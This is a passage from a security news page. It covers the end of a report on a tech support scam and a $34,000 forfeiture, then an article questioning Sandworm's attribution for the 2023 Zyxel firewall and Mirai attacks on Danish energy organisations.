In reality, the scammer had overlaid a blue screen on the monitor so the victim couldn’t see his actions and transferred $34,000 from the victim’s own Money Market (savings) account to their checking balance.

After the fraudulent activity was identified, on December 7, JP Morgan Chase restricted Zhou’s access to the funds in his accounts, and these funds were moved to a suspense account controlled by the bank.

Jollif’s application seeks to seize the $34,000 derived from Zhou’s activities, considering it potentially criminal proceeds. Zhou now faces charges of wire fraud and involvement in a phishing scam and might also be charged with possible money laundering, bank fraud, and conspiracy to commit wire fraud.

Source –

New Findings Challenge Attribution in Denmark’s Energy Sector Cyberattacks

Cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings show.

The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a follow-on activity cluster that saw the attackers deploy Mirai botnet variants on infected hosts via an as-yet-unknown initial access vector.

The first wave took place on May 11, while the second wave lasted from May 22 to 31, 2023. In one such attack detected on May 24, it was observed that the compromised system was communicating with IP addresses (217.57.80[.]18 and 70.62.153[.]174) that were previously used as command-and-control (C2) for the now-dismantled Cyclops Blink botnet.

Closer examination of the attack campaign, however, has revealed that not only were the two waves unrelated, but also unlikely the work of the state-sponsored group owing to the fact the second wave was part of a broader mass exploitation campaign against unpatched Zyxel firewalls. It’s currently not known who is behind the twin sets of attacks.

There is evidence to suggest that the attacks may have started as early as February 16 using other known flaws in Zyxel devices (CVE-2020-9054 and CVE-2022-30525) alongside CVE-2023-28771, and persisted as late as October 2023, with the activity singling out various entities across Europe and the U.S.

This is further evidence that exploitation of CVE-2023-28771, rather than being limited to Danish critical infrastructure, is ongoing and targeting exposed devices, some of which just happen to be Zyxel firewalls safeguarding critical infrastructure organizations.

Cyber attacks are difficult to attribute to a specific threat actor and there is no concrete evidence to accuse Russia of being involved in the attack.

Source –


    Copyright Smarttech247 - 2021